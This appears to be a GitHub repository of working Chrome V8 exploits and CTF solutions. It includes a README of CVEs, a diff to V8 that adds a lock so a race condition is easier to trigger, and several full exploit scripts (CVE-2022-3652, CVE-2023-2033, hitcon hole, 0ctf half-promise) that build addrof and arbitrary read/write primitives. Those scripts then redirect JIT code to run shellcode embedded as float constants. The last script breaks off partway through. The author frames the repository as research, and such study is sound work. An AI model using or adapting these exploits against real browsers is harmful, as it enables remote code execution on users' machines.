├── CVE-2023-4427 ├── poc.html └── poc.js ├── .gitmodules ├── LICENSE ├── CVE-2022-3652 ├── lock.diff └── exp.js ├── README.md ├── 2023-0ctf-half-promise.js ├── CVE-2023-2033.js ├── 2022-hitcon-hole.js ├── CVE-2020-6418.js ├── CVE-2018-17463.js ├── 34C3-v9.js └── CVE-2022-1310.js /CVE-2023-4427/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "CVE-2024-1939"] 2 | path = CVE-2024-1939 3 | url = https://github.com/rycbar77/CVE-2024-1939 4 | [submodule "CVE-2024-2887"] 5 | path = CVE-2024-2887 6 | url = https://github.com/rycbar77/CVE-2024-2887 7 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 r4z77 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /CVE-2022-3652/lock.diff: -------------------------------------------------------------------------------- 1 | diff --git a/src/compiler/js-create-lowering.cc b/src/compiler/js-create-lowering.cc 2 | index 4cc0a9a3af4..9cee701a56f 100644 3 | --- a/src/compiler/js-create-lowering.cc 4 | +++ b/src/compiler/js-create-lowering.cc 5 | @@ -25,6 +25,7 @@ 6 | #include "src/objects/js-regexp-inl.h" 7 | #include "src/objects/objects-inl.h" 8 | 9 | +volatile intptr_t mylock = 0; 10 | namespace v8 { 11 | namespace internal { 12 | namespace compiler { 13 | @@ -1096,6 +1097,7 @@ Reduction JSCreateLowering::ReduceJSCreateLiteralArrayOrObject(Node* node) { 14 | CreateLiteralParameters const& p = n.Parameters(); 15 | Effect effect = n.effect(); 16 | Control control = n.control(); 17 | + while (mylock != 1 && mylock!=2); 18 | ProcessedFeedback const& feedback = 19 | broker()->GetFeedbackForArrayOrObjectLiteral(p.feedback()); 20 | if (!feedback.IsInsufficient()) { 21 | @@ -1824,6 +1826,7 @@ base::Optional JSCreateLowering::TryAllocateFastLiteral( 22 | for (auto const& inobject_field : inobject_fields) { 23 | builder.Store(inobject_field.first, inobject_field.second); 24 | } 25 | + mylock = 2; 26 | return builder.Finish(); 27 | } 28 | 29 | diff --git a/src/objects/js-objects-inl.h b/src/objects/js-objects-inl.h 30 | index 0ad9acfce4d..511561b06fa 100644 31 | --- a/src/objects/js-objects-inl.h 32 | +++ b/src/objects/js-objects-inl.h 33 | @@ -26,6 +26,8 @@ 34 | // Has to be the last include (doesn't have include guards): 35 | #include "src/objects/object-macros.h" 36 | 37 | +extern volatile intptr_t mylock; 38 | + 39 | namespace v8 { 40 | namespace internal { 41 | 42 | @@ -247,6 +249,10 @@ void JSObject::SetMapAndElements(Handle object, Handle new_map, 43 | DCHECK((*value == ReadOnlyRoots(isolate).empty_fixed_array()) || 44 | (object->map().has_fast_double_elements() == 45 | value->IsFixedDoubleArray())); 46 | + if (mylock==0) { 47 | + mylock=1; 48 | + while(mylock!=2); 49 | + } 50 | object->set_elements(*value); 51 | } 52 | 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # V8Exploits 2 | Chrome V8 CVE exploits and proof-of-concept scripts written by me, for educational and research purposes only. 3 | 4 | ## CVES 5 | 6 | ### CVE-2018-17463 7 | 8 | hash: 568979f4d891bafec875fab20f608ff9392f4f29 9 | 10 | env: Linux 11 | 12 | details: https://xz.aliyun.com/t/13075 13 | 14 | #### references 15 | 16 | http://p4nda.top/2019/06/11/%C2%96CVE-2018-17463/ 17 | 18 | https://bugs.chromium.org/p/chromium/issues/detail?id=888923 19 | 20 | ### CVE-2022-1310 21 | 22 | hash: e1e92f8ba77145568e781b47b31ad82535e868bf 23 | 24 | env: Windows 25 | 26 | #### references 27 | 28 | https://bugs.chromium.org/p/chromium/issues/detail?id=1307610 29 | 30 | https://paper.seebug.org/1955/ 31 | 32 | ### CVE-2022-3652 33 | 34 | ver: 10.6.194.12 35 | 36 | env: linux 37 | 38 | race condition, use lock to make it easy to trigger. 39 | 40 | #### references 41 | 42 | https://bugs.chromium.org/p/chromium/issues/detail?id=1369871 43 | 44 | ### CVE-2023-2033 45 | 46 | hash: f7a3499f6d7e50b227a17d2bbd96e4b59a261d3c 47 | 48 | env: Linux 49 | 50 | #### references 51 | 52 | https://github.com/mistymntncop/CVE-2023-2033 53 | 54 | https://bugs.chromium.org/p/chromium/issues/detail?id=1445008 55 | 56 | https://bugs.chromium.org/p/chromium/issues/detail?id=1432210 57 | 58 | https://h0meb0dy.me/entry/TheHole-Exploit-from-TheHole-to-Shellcode 59 | 60 | https://cwresearchlab.co.kr/entry/CVE-2023-2033-JIT-optimisation-issue 61 | 62 | https://cwresearchlab.co.kr/entry/Chrome-v8-Hole-Exploit 63 | 64 | ### CVE-2023-4427 65 | 66 | hash: 610c1976fe17b5bfb12eefe1e6dc7c3a5bd5141a 67 | 68 | 出在了强网杯的决赛，当时只在本地打通了，赛后修改了一下，用一个新线程来稳定内存布局，还是不太稳定，不确定是否为预期解。 69 | 70 | POC analysis: https://rycbar77.github.io/2023/12/01/CVE-2023-4427%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/ 71 | 72 | ### CVE-2020-6418 73 | 74 | bi0sctf 2024 ezv8 75 | 76 | #### references 77 | 78 | https://chromium.googlesource.com/v8/v8.git/+/d65423559f2ed0f24f69994906fbad0860501799%5E!/ 79 | 80 | ### CVE-2024-0517 81 | 82 | xctf-final 0ob 83 | 84 | See https://github.com/rycbar77/writeups/tree/master/2024/xctf-final/0ob 85 | 86 | ### CVE-2024-1939 87 | 88 | V8CTF M122 89 | 90 | ### CVE-2024-2887 91 | 92 | V8CTF M123 93 | 94 | ## CTF 95 | 96 | ### 34C3 v9 97 | 98 | #### references 99 | 100 | https://github.com/saelo/v9 101 | 102 | ### 2022 hitcon hole 103 | 104 | #### references 105 | 106 | ### 2023 0ctf half-promise 107 | 108 | hijack wasm jump_table_start to control rip. 109 | 110 | ### 2024 PlaidCTF Maglev 111 | 112 | See https://github.com/rycbar77/writeups/tree/master/2024/plaidctf/maglev 113 | 114 | ### 2024 htb-bussiness pwn_pyrrhus 115 | 116 | See https://github.com/rycbar77/writeups/tree/master/2024/htb-bussiness/pwn_pyrrhus 117 | 118 | ### 2024 Google-ctf heat 119 | 120 | See https://github.com/rycbar77/writeups/tree/master/2024/google-ctf/heat 121 | 122 | ### 2024 hitconctf V8 SBX 123 | 124 | See https://github.com/rycbar77/writeups/tree/master/2024/hitconctf/V8%20SBX 125 | 126 | ### 2024 sekaictf ContextReducer 127 | 128 | See https://github.com/rycbar77/writeups/blob/master/2024/sekaictf/ContextReducer/ -------------------------------------------------------------------------------- /CVE-2022-3652/exp.js: -------------------------------------------------------------------------------- 1 | /* eslint-disable camelcase */ 2 | /* eslint-disable no-extend-native */ 3 | /* eslint-disable no-unused-vars */ 4 | /* eslint-disable require-jsdoc */ 5 | function gc_minor() { 6 | for (let i = 0; i < 1000; i++) { 7 | new ArrayBuffer(0x10000); 8 | } 9 | } 10 | 11 | function gc_major() { 12 | new ArrayBuffer(0x7fe00000); 13 | } 14 | 15 | const buf = new ArrayBuffer(16); 16 | const float64 = new Float64Array(buf); 17 | const bigUint64 = new BigUint64Array(buf); 18 | function f2i(f) { 19 | float64[0] = f; 20 | return bigUint64[0]; 21 | } 22 | function i2f(i) { 23 | bigUint64[0] = i; 24 | return float64[0]; 25 | } 26 | 27 | Number.prototype.toBigInt = function toBigInt() { 28 | float64[0] = this; 29 | return bigUint64[0]; 30 | }; 31 | 32 | BigInt.prototype.toNumber = function toNumber() { 33 | bigUint64[0] = this; 34 | return float64[0]; 35 | }; 36 | 37 | function hex(i) { 38 | return i.toString(16).padStart(16, '0'); 39 | } 40 | 41 | // =================== // 42 | // Start here! // 43 | // =================== // 44 | 45 | function sleep(miliseconds) { 46 | const currentTime = new Date().getTime(); 47 | while (currentTime + miliseconds >= new Date().getTime()) {} 48 | } 49 | 50 | function a(f) { 51 | const c = [1.33753945707788105686024880174e-318, 2.2, , 4.4]; 52 | const aaa = Math.log(2); 53 | if (f) { 54 | c[0] = {}; 55 | } 56 | return c; 57 | } 58 | 59 | for (let i = 0; i < 4516; i++) a(false); 60 | a(false); 61 | 62 | a(true); 63 | 64 | sleep(1000); 65 | 66 | const shellcode = () => { 67 | return [1.95538254221075331056310651818E-246, 68 | 1.95606125582421466942709801013E-246, 69 | 1.99957147195425773436923756715E-246, 70 | 1.95337673326740932133292175341E-246, 71 | 2.63486047652296056448306022844E-284]; 72 | }; 73 | 74 | for (let i = 0; i < 0x10000; i++) { 75 | shellcode(); shellcode(); shellcode(); shellcode(); 76 | } 77 | sleep(1000); 78 | 79 | gc_minor(); 80 | gc_major(); 81 | 82 | const test = [ 83 | 1.86417340672235361759473944203e-310, 1.11253692938735068472773773438e-308, 84 | 3.3, 4.4, 85 | ]; 86 | // %DebugPrint(test); 87 | const obj_arr = [{}, {}, {}, {}]; 88 | // %DebugPrint(obj_arr); 89 | const driver_arr = [1.1, 2.2, 3.3, 4.4]; 90 | // %DebugPrint(driver_arr); 91 | // %SystemBreak(); 92 | 93 | const ccc = a(false); 94 | // console.log(ccc[3]); 95 | const arr = ccc[0]; 96 | // console.log(hex(f2i(arr[37]))); 97 | // %SystemBreak(); 98 | 99 | function addrof(obj) { 100 | obj_arr[0] = obj; 101 | return arr[11]; 102 | } 103 | 104 | // const tt=[1.1]; 105 | // // %DebugPrint(tt); 106 | // const tt2=addrof(tt); 107 | // console.log(hex(f2i(tt2)&0xffffffffn)); 108 | 109 | function aar(addr) { 110 | const fake_length_elements = (8n << 32n) | (addr - 8n); 111 | arr[37] = i2f(fake_length_elements); 112 | return driver_arr[0]; 113 | } 114 | 115 | // let t=1.1; 116 | // let res=aar(f2i(addrof(t))&0xffffffffn); 117 | // console.log(res) 118 | 119 | function aaw(addr, value) { 120 | const fake_length_elements = (8n << 32n) | (addr - 8n); 121 | arr[37] = i2f(fake_length_elements); 122 | driver_arr[0] = value; 123 | } 124 | 125 | // let test_arr = [4.4, 2.2]; 126 | // aaw((f2i(addrof(test_arr)) & 0xffffffffn) + 0x20n, 3.3); 127 | // console.log(test_arr); 128 | 129 | // %DebugPrint(shellcode); 130 | // %SystemBreak(); 131 | const shellcode_addr = f2i(addrof(shellcode))&0xffffffffn; 132 | console.log(hex(shellcode_addr)); 133 | const code_addr = f2i(aar(shellcode_addr + 0x18n)) & 0xffffffffn; 134 | console.log(hex(code_addr)); 135 | const real_inst = f2i(aar(code_addr + 0x10n)) + 0x60n; 136 | console.log(hex(real_inst)); 137 | aaw(code_addr + 0x10n, i2f(real_inst)); 138 | // %SystemBreak(); 139 | shellcode(); 140 | -------------------------------------------------------------------------------- /2023-0ctf-half-promise.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 | return this.u32[0] 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1] 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | var helper = new Helpers(); 83 | 84 | // =================== // 85 | // Start here! // 86 | // =================== // 87 | 88 | var sbxMemView = new Sandbox.MemoryView(0, 0xfffffff8); 89 | var addrOf = (o) => Sandbox.getAddressOf(o); 90 | 91 | var dv = new DataView(sbxMemView); 92 | 93 | var readHeap4 = (offset) => dv.getUint32(offset, true); 94 | var readHeap8 = (offset) => dv.getBigUint64(offset, true); 95 | 96 | var writeHeap1 = (offset, value) => dv.setUint8(offset, value, true); 97 | var writeHeap4 = (offset, value) => dv.setUint32(offset, value, true); 98 | var writeHeap8 = (offset, value) => dv.setBigUint64(offset, value, true); 99 | 100 | //ceb580067616c68 101 | //ceb5a6674656768 102 | //cebf63120e0c148 103 | //ceb50d231d00148 104 | //50f583b6ae78948 105 | // console.log(helper.i64tof64(0xceb580067616c68n)) 106 | // console.log(helper.i64tof64(0xceb5a6674656768n)) 107 | // console.log(helper.i64tof64(0xcebf63120e0c148n)) 108 | // console.log(helper.i64tof64(0xceb50d231d00148n)) 109 | // console.log(helper.i64tof64(0x50f583b6ae78948n)) 110 | 111 | helper.scavenge_gc(); 112 | const shellcode = () => { 113 | 114 | return [1.9553825376526264e-246, 115 | 1.956052573379787e-246, 116 | 1.9995714719542577e-246, 117 | 1.9533767332674093e-246, 118 | 2.6348604765229606e-284]; 119 | 120 | } 121 | 122 | for (var i = 0; i < 0x1000000; i++) { 123 | shellcode(); shellcode(); shellcode(); shellcode(); 124 | } 125 | 126 | let inst = readHeap4(0x40a159 + 0x10 - 1); 127 | 128 | inst += 0x62; 129 | console.log(helper.hex(inst)); 130 | 131 | var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); 132 | var wasmModule = new WebAssembly.Module(wasmCode); 133 | var wasmInstance = new WebAssembly.Instance(wasmModule); 134 | var f = wasmInstance.exports.main; 135 | 136 | let wasmAddr = addrOf(wasmInstance) 137 | console.log("wasmInstance @ " + wasmAddr.toString(16)); 138 | 139 | 140 | cage_base = readHeap4(0x40014) 141 | console.log("CAGE_BASE @ " + cage_base.toString(16)) 142 | 143 | writeHeap8(wasmAddr + 0x60 - 0x8 - 0x10, helper.f64toi64(helper.pair_i32_to_f64(inst, cage_base))); 144 | 145 | f() 146 | 147 | -------------------------------------------------------------------------------- /CVE-2023-2033.js: -------------------------------------------------------------------------------- 1 | function gc_minor() { 2 | for (let i = 0; i < 1000; i++) { 3 | new ArrayBuffer(0x10000); 4 | } 5 | } 6 | 7 | function gc_major() { 8 | new ArrayBuffer(0x7fe00000); 9 | } 10 | 11 | var buf = new ArrayBuffer(16); 12 | var float64 = new Float64Array(buf); 13 | var bigUint64 = new BigUint64Array(buf); 14 | 15 | function f2i(f) { 16 | float64[0] = f; 17 | return bigUint64[0]; 18 | } 19 | 20 | function i2f(i) { 21 | bigUint64[0] = i; 22 | return float64[0]; 23 | } 24 | 25 | Number.prototype.toBigInt = function toBigInt() { 26 | float64[0] = this; 27 | return bigUint64[0]; 28 | }; 29 | 30 | BigInt.prototype.toNumber = function toNumber() { 31 | bigUint64[0] = this; 32 | return float64[0]; 33 | }; 34 | 35 | function hex(i) { 36 | return i.toString(16).padStart(16, "0"); 37 | } 38 | 39 | // =================== // 40 | // Start here! // 41 | // =================== // 42 | 43 | function load_stack() { 44 | let a = stack; 45 | return a; 46 | } 47 | 48 | Error.captureStackTrace(globalThis); 49 | Error.prepareStackTrace = () => { 50 | delete stack; 51 | Object.defineProperty(globalThis, 'stack', { value: 1, writable: true }); // configurable: false 52 | stack = {}; // cell_type == kMutable 53 | 54 | for (let i = 0; i < 0x10000; i++) { load_stack(); } 55 | } 56 | 57 | Object.defineProperty(globalThis, 'stack', { value: 1, configurable: true }); 58 | delete stack; 59 | let hole = load_stack(); // the_hole 60 | 61 | // console.log(hole); 62 | 63 | 64 | // must be const 65 | const the = { 66 | hole: hole 67 | }; 68 | 69 | let f_arr; 70 | let o_arr; 71 | 72 | let floatMap; 73 | let floatProperty; 74 | 75 | function oob(bool) { 76 | let hole = the.hole; 77 | let idx = (Number(bool ? hole : -1) | 0) + 1; 78 | 79 | f_arr = [1.1]; 80 | let compressedPointer = f2i(f_arr.at(idx * 1)); 81 | floatMap = compressedPointer & 0xffffffffn; 82 | floatProperty = compressedPointer >> 32n; 83 | } 84 | 85 | for (var i = 0; i < 0x10000; i++) { 86 | oob(true); 87 | } 88 | // % PrepareFunctionForOptimization(oob); 89 | // oob(true); 90 | // % OptimizeFunctionOnNextCall(oob); 91 | // oob(true); 92 | // console.log(oob(true)); 93 | 94 | 95 | // primitive addrof 96 | function addrof(bool, obj) { 97 | let hole = the.hole; 98 | let idx = (Number(bool ? hole : -1) | 0) + 1; // 1 or 0 99 | f_arr = [1.1]; 100 | o_arr = [obj]; 101 | // return f2i(f_arr.at(idx * 4)) & 0xffffffffn; 102 | return f2i(f_arr.at(idx * 4)) & 0xffffffffn; 103 | } 104 | 105 | for (var i = 0; i < 0x10000; i++) { 106 | addrof(true, {}); 107 | } 108 | 109 | // % PrepareFunctionForOptimization(addrof); 110 | // addrof(true,{}); 111 | // % OptimizeFunctionOnNextCall(addrof); 112 | // addrof(true,{}); 113 | 114 | // primitive fakeobj 115 | function fakeobj(bool, addr) { 116 | let hole = the.hole; 117 | let idx = (Number(bool ? hole : -1) | 0) + 1; 118 | addr = i2f(addr); 119 | 120 | o_arr = [{}]; 121 | f_arr = [addr]; 122 | 123 | let fake_obj = o_arr.at(idx * 7); 124 | return fake_obj; 125 | } 126 | 127 | for (var i = 0; i < 0x10000; i++) { 128 | fakeobj(true, f2i(1.1)); 129 | } 130 | 131 | // % PrepareFunctionForOptimization(fakeobj); 132 | // fakeobj(true, f2i(1.1)); 133 | // % OptimizeFunctionOnNextCall(fakeobj); 134 | // fakeobj(true, f2i(1.1)); 135 | 136 | // primitive arbitrary address read 137 | function aar(addr) { 138 | let fake_obj_header = [1.1, 2.2]; 139 | fake_obj_header[0] = i2f((floatProperty << 32n) | floatMap); 140 | fake_obj_header[1] = i2f((2n << 32n) | (addr - 8n)); 141 | let dbl_arr_struct_addr = addrof(true, fake_obj_header); 142 | let fake_dbl_arr = fakeobj(true, dbl_arr_struct_addr - 0x10n); 143 | return fake_dbl_arr[0]; 144 | } 145 | 146 | function aaw(addr, value) { 147 | let fake_obj_header = [1.1, 2.2]; 148 | fake_obj_header[0] = i2f((floatProperty << 32n) | floatMap); 149 | fake_obj_header[1] = i2f((2n << 32n) | (addr - 8n)); 150 | let dbl_arr_struct_addr = addrof(true, fake_obj_header); 151 | 152 | let fake_dbl_arr = fakeobj(true, dbl_arr_struct_addr - 0x10n); 153 | fake_dbl_arr[0] = i2f(value); 154 | } 155 | 156 | 157 | gc_major(); 158 | const shellcode = () => { 159 | return [1.95538254221075331056310651818E-246, 160 | 1.95606125582421466942709801013E-246, 161 | 1.99957147195425773436923756715E-246, 162 | 1.95337673326740932133292175341E-246, 163 | 2.63486047652296056448306022844E-284]; 164 | } 165 | 166 | for (var i = 0; i < 0x10000; i++) { 167 | shellcode(); 168 | } 169 | //% PrepareFunctionForOptimization(shellcode); 170 | //shellcode(); 171 | //% OptimizeFunctionOnNextCall(shellcode); 172 | //shellcode(); 173 | 174 | //%DebugPrint(shellcode); 175 | let shellcode_addr = addrof(true, shellcode); 176 | let code_addr = f2i(aar(shellcode_addr + 0x18n)) & 0xffffffffn; 177 | let real_inst = f2i(aar(code_addr + 0x10n)) + 0x56n; 178 | aaw(code_addr + 0x10n, real_inst); 179 | //%SystemBreak(); 180 | shellcode(); 181 | 182 | -------------------------------------------------------------------------------- /2022-hitcon-hole.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 | return this.u32[0] 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1] 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | var helper = new Helpers(); 83 | 84 | // =================== // 85 | // Start here! // 86 | // =================== // 87 | const shellcode = () => { 88 | return [1.95538254221075331056310651818E-246, 89 | 1.95606125582421466942709801013E-246, 90 | 1.99957147195425773436923756715E-246, 91 | 1.95337673326740932133292175341E-246, 92 | 2.63486047652296056448306022844E-284]; 93 | } 94 | 95 | // % PrepareFunctionForOptimization(shellcode); 96 | // shellcode(); 97 | // % OptimizeFunctionOnNextCall(shellcode); 98 | // shellcode(); 99 | for (let i = 0; i < 0x10000; i++) { shellcode(); shellcode(); shellcode(); shellcode(); } 100 | 101 | let arr = new Array(1); 102 | let hole = arr.hole(); 103 | // %DebugPrint(hole); 104 | let map = new Map(); 105 | map.set(1, 1); 106 | // console.log(map.size); 107 | map.set(hole, 1); 108 | // console.log(map.size); 109 | map.delete(hole); 110 | // console.log(map.size); 111 | map.delete(hole); 112 | // console.log(map.size); 113 | map.delete(1); 114 | % DebugPrint(map); 115 | // %SystemBreak(); 116 | // console.log(map.size); 117 | map.set(16, 1); 118 | let victim = new Array(1.1, 2.2); 119 | 120 | // %SystemBreak(); 121 | map.set(victim, 0xffff); 122 | // console.log(helper.hex(helper.f64toi64(victim[0]))); 123 | // %SystemBreak(); 124 | let driver_arr = new Array(1.1, 2.2); 125 | let victim_obj = new Array({}); 126 | 127 | 128 | function addr_of(obj) { 129 | victim_obj[0] = obj; 130 | return victim[18]; 131 | } 132 | // let obj={}; 133 | // %DebugPrint(obj); 134 | // let addr=addr_of(obj); 135 | // console.log(helper.hex(helper.ftoih(addr))); 136 | function aar(addr) { 137 | victim[6] = helper.pair_i32_to_f64(addr - 8, helper.ftoih(victim[6])); 138 | // console.log(helper.hex(helper.get_i64())); 139 | return driver_arr[0]; 140 | } 141 | // let obj = {}; 142 | // % DebugPrint(obj); 143 | // let addr = addr_of(obj); 144 | // console.log(helper.hex(helper.f64toi64(aar(helper.ftoih(addr))))); 145 | function aaw(addr, value) { 146 | victim[6] = helper.pair_i32_to_f64(addr - 8, helper.ftoih(victim[6])); 147 | // console.log(helper.hex(helper.get_i64())); 148 | driver_arr[0] = value; 149 | } 150 | // let obj = {}; 151 | // % DebugPrint(obj); 152 | // let addr = addr_of(obj); 153 | // aaw(helper.ftoih(addr), 1.1); 154 | 155 | % DebugPrint(victim); 156 | % DebugPrint(driver_arr); 157 | % DebugPrint(victim_obj); 158 | % DebugPrint(shellcode); 159 | // % SystemBreak(); 160 | let shellcode_addr = addr_of(shellcode); 161 | console.log(helper.hex(helper.ftoih(shellcode_addr))); 162 | // % SystemBreak(); 163 | let code = helper.ftoil(aar(helper.ftoih(shellcode_addr) + 0x18)); // code pointer of shellcode() 164 | console.log(helper.hex(code)); 165 | // % SystemBreak(); 166 | let inst = helper.f64toi64(aar(code + 0xC)); // instructions pointer of shellcode() 167 | console.log(helper.hex(inst)); 168 | // % SystemBreak(); 169 | inst += 0x60n; // address of actual shellcode 170 | aaw(code + 0xC, helper.i64tof64(inst)); 171 | // %SystemBreak(); 172 | shellcode(); 173 | // % SystemBreak(); 174 | 175 | 176 | -------------------------------------------------------------------------------- /CVE-2020-6418.js: -------------------------------------------------------------------------------- 1 | class Helpers { 2 | constructor() { 3 | this.buf = new ArrayBuffer(8); 4 | this.dv = new DataView(this.buf); 5 | this.u8 = new Uint8Array(this.buf); 6 | this.u32 = new Uint32Array(this.buf); 7 | this.u64 = new BigUint64Array(this.buf); 8 | this.f32 = new Float32Array(this.buf); 9 | this.f64 = new Float64Array(this.buf); 10 | 11 | this.roots = new Array(0x30000); 12 | this.index = 0; 13 | } 14 | 15 | pair_i32_to_f64(p1, p2) { 16 | this.u32[0] = p1; 17 | this.u32[1] = p2; 18 | return this.f64[0]; 19 | } 20 | 21 | i64tof64(i) { 22 | this.u64[0] = i; 23 | return this.f64[0]; 24 | } 25 | 26 | f64toi64(f) { 27 | this.f64[0] = f; 28 | return this.u64[0]; 29 | } 30 | 31 | set_i64(i) { 32 | this.u64[0] = i; 33 | } 34 | 35 | set_l(i) { 36 | this.u32[0] = i; 37 | } 38 | 39 | set_h(i) { 40 | this.u32[1] = i; 41 | } 42 | 43 | get_i64() { 44 | return this.u64[0]; 45 | } 46 | 47 | ftoil(f) { 48 | this.f64[0] = f; 49 | return this.u32[0]; 50 | } 51 | 52 | ftoih(f) { 53 | this.f64[0] = f; 54 | return this.u32[1]; 55 | } 56 | 57 | add_ref(object) { 58 | this.roots[this.index++] = object; 59 | } 60 | 61 | mark_sweep_gc() { 62 | new ArrayBuffer(0x7fe00000); 63 | } 64 | 65 | scavenge_gc() { 66 | for (var i = 0; i < 8; i++) { 67 | // fill up new space external backing store bytes 68 | this.add_ref(new ArrayBuffer(0x200000)); 69 | } 70 | this.add_ref(new ArrayBuffer(8)); 71 | } 72 | 73 | hex(i) { 74 | return i.toString(16).padStart(16, "0"); 75 | } 76 | 77 | breakpoint() { 78 | this.buf.slice(); 79 | } 80 | } 81 | 82 | var helper = new Helpers(); 83 | 84 | // =================== // 85 | // Start here! // 86 | // =================== // 87 | 88 | helper.scavenge_gc(); 89 | helper.mark_sweep_gc(); 90 | 91 | var a = [, , , , , , , , , , , , , , , , , , , , 1.1, 2.2, 3.3]; 92 | a.pop(); 93 | a.pop(); 94 | a.pop(); 95 | let b; 96 | let dbl_arr; 97 | let obj_arr; 98 | function empty() {} 99 | 100 | function f(p) { 101 | return a.push( 102 | Reflect.construct(empty, arguments, p) 103 | ? 4.1445230292290474904519183884e-317 104 | : 4.1445230292290474904519183884e-317 105 | ); 106 | } 107 | 108 | let p = new Proxy(Object, { 109 | get: () => { 110 | a[0] = {}; 111 | b = [1.1, 2.2, 3.3, 4.4, 5.5]; 112 | bar = []; 113 | dbl_arr = [1.1, 2.2, 3.3, 4.4]; 114 | obj_arr = [{}, {}, {}, {}]; 115 | return Object.prototype; 116 | }, 117 | }); 118 | 119 | function main(p) { 120 | return f(p); 121 | } 122 | 123 | for (var i = 0; i < 0x10000; i++) { 124 | main(empty); 125 | a.pop(); 126 | main(empty); 127 | a.pop(); 128 | main(empty); 129 | a.pop(); 130 | main(empty); 131 | 